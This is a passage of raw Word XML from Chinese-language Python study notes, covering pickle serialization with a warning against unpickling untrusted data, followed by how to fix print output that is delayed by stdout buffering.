          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t># data = {'a':12, 'b':34} # Some Python object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t># f = open('somefile', 'wb')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t># pickle.dump(data, f)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>如果仅是变为字符串，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dumps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t># s = pickle.dumps(data)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t># print(s)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">f = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'somefile'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'rb'</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data = pickle.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(f)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(data)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(data))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t># Restore from a string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t># data = pickle.loads(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA6759E" w14:textId="77777777" w:rsidR="0044148F" w:rsidRDefault="0044148F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="190610A7" w14:textId="77777777" w:rsidR="0044148F" w:rsidRDefault="0044148F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2428BA42" w14:textId="2922103F" w:rsidR="0044148F" w:rsidRPr="0044148F" w:rsidRDefault="0044148F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反序列化风险</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323FE583" w14:textId="77777777" w:rsidR="0044148F" w:rsidRPr="0044148F" w:rsidRDefault="0044148F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0044148F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>千万不要对不信任的数据使用</w:t>
      </w:r>
      <w:r w:rsidRPr="0044148F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pickle.load()</w:t>
      </w:r>
      <w:r w:rsidRPr="0044148F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585495F3" w14:textId="77777777" w:rsidR="0044148F" w:rsidRDefault="0044148F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pickle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在加载时有一个副作用就是它会自动加载相应模块并构造实例对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4009706E" w14:textId="77777777" w:rsidR="0044148F" w:rsidRDefault="0044148F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是某个坏人如果知道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pickle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的工作原理，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452B0E0B" w14:textId="77777777" w:rsidR="0044148F" w:rsidRDefault="0044148F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>他就可以创建一个恶意的数据导致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行随意指定的系统命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC68CEC" w14:textId="77777777" w:rsidR="0044148F" w:rsidRDefault="0044148F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此，一定要保证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pickle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只在相互之间可以认证对方的解析器的内部使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E308399" w14:textId="1F18F3CE" w:rsidR="0044148F" w:rsidRDefault="0044148F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有些类型的对象是不能被序列化的。这些通常是那些依赖外部系统状态的对象，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如打开的文件，网络连接，线程，进程，栈帧等等。</w:t>
      </w:r>
      <w:r w:rsidRPr="0044148F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0044148F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>用户自定义类可以通过提供</w:t>
      </w:r>
      <w:r w:rsidRPr="0044148F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> __getstate__() </w:t>
      </w:r>
      <w:r w:rsidRPr="0044148F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="0044148F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> __setstate__() </w:t>
      </w:r>
      <w:r w:rsidRPr="0044148F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>方法来绕过这些限制。</w:t>
      </w:r>
      <w:r w:rsidRPr="0044148F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0044148F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如果定义了这两个方法，</w:t>
      </w:r>
      <w:r w:rsidRPr="0044148F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">pickle.dump() </w:t>
      </w:r>
      <w:r w:rsidRPr="0044148F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>就会调用</w:t>
      </w:r>
      <w:r w:rsidRPr="0044148F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> __getstate__() </w:t>
      </w:r>
      <w:r w:rsidRPr="0044148F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>获取序列化的对象。</w:t>
      </w:r>
      <w:r w:rsidRPr="0044148F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0044148F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类似的，</w:t>
      </w:r>
      <w:r w:rsidRPr="0044148F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">__setstate__() </w:t>
      </w:r>
      <w:r w:rsidRPr="0044148F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>在反序列化时被调用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3311190C" w14:textId="77777777" w:rsidR="0044148F" w:rsidRDefault="0044148F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12AAB4D4" w14:textId="77777777" w:rsidR="0044148F" w:rsidRDefault="0044148F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F0BCB39" w14:textId="77777777" w:rsidR="0044148F" w:rsidRDefault="0044148F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27FC00E8" w14:textId="77777777" w:rsidR="0044148F" w:rsidRDefault="0044148F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A9B4BBB" w14:textId="77777777" w:rsidR="0044148F" w:rsidRDefault="0044148F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12C523BA" w14:textId="77777777" w:rsidR="0044148F" w:rsidRDefault="0044148F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="536BF437" w14:textId="77777777" w:rsidR="0044148F" w:rsidRDefault="0044148F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C5C208A" w14:textId="77777777" w:rsidR="0044148F" w:rsidRDefault="0044148F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EEE54C8" w14:textId="740A2C19" w:rsidR="00E47208" w:rsidRDefault="00E47208" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="425" w:name="_Toc159779873"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入输出不立即打印</w:t>
      </w:r>
      <w:bookmarkEnd w:id="425"/>
    </w:p>
    <w:p w14:paraId="1BB2BDB3" w14:textId="39E553C7" w:rsidR="00E47208" w:rsidRDefault="00E47208" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09F1BE0A" w14:textId="12B8B4ED" w:rsidR="00FE70E6" w:rsidRDefault="00C41AC2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41AC2">
        <w:t>https://blog.csdn.net/whatday/article/details/111594408</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D40DDB" w14:textId="1F9ADA62" w:rsidR="00FE70E6" w:rsidRDefault="00FE70E6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE70E6">
        <w:t>https://www.jianshu.com/p/6c0cc9da2752</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BB63B7" w14:textId="459CA73A" w:rsidR="00E47208" w:rsidRDefault="00FE70E6" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="785"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BADE67" w14:textId="074AF067" w:rsidR="00A83484" w:rsidRDefault="00A83484" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A83484">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>因为标准输入输出</w:t>
      </w:r>
      <w:r w:rsidRPr="00A83484">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>stdin/stdout</w:t>
      </w:r>
      <w:r w:rsidRPr="00A83484">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>有缓冲区，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A83484">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A83484">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r w:rsidRPr="00A83484">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不能立即打印出来，作为刚接触</w:t>
      </w:r>
      <w:r w:rsidRPr="00A83484">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidRPr="00A83484">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的菜鸟，迷瞪了半天</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB6A4C1" w14:textId="394B7764" w:rsidR="00A83484" w:rsidRDefault="00A83484" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F30094D" w14:textId="0CA7F379" w:rsidR="001E10A8" w:rsidRDefault="001E10A8" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法一：手动刷新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4362567F" w14:textId="77777777" w:rsidR="00A83484" w:rsidRDefault="00A83484" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">import sys </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9D0F0B" w14:textId="77777777" w:rsidR="00A83484" w:rsidRDefault="00A83484" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def hello():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A56E8B8" w14:textId="77777777" w:rsidR="00A83484" w:rsidRDefault="00A83484" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>print("hello world!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5287F806" w14:textId="532ABEDF" w:rsidR="00C41AC2" w:rsidRDefault="00A83484" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001E10A8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sys.stdout.flush()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E9C103" w14:textId="08302C96" w:rsidR="00C41AC2" w:rsidRDefault="00C41AC2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B2B3A74" w14:textId="6FB40017" w:rsidR="001E10A8" w:rsidRPr="00C41AC2" w:rsidRDefault="001E10A8" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法二：手动刷</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC1E609" w14:textId="17CD8411" w:rsidR="00E47208" w:rsidRDefault="000F51D5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000F51D5">
        <w:t xml:space="preserve">print("hello world!", </w:t>
      </w:r>
      <w:r w:rsidRPr="000F51D5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>flush=True</w:t>
      </w:r>
      <w:r w:rsidRPr="000F51D5">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB7ADC8" w14:textId="657F01DD" w:rsidR="00E47208" w:rsidRDefault="00E47208" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5477636F" w14:textId="5F453769" w:rsidR="00651822" w:rsidRDefault="001E10A8" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法三：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB6DC50" w14:textId="77777777" w:rsidR="00651822" w:rsidRDefault="00651822" w:rsidP="009222EB">
      <w:pPr>
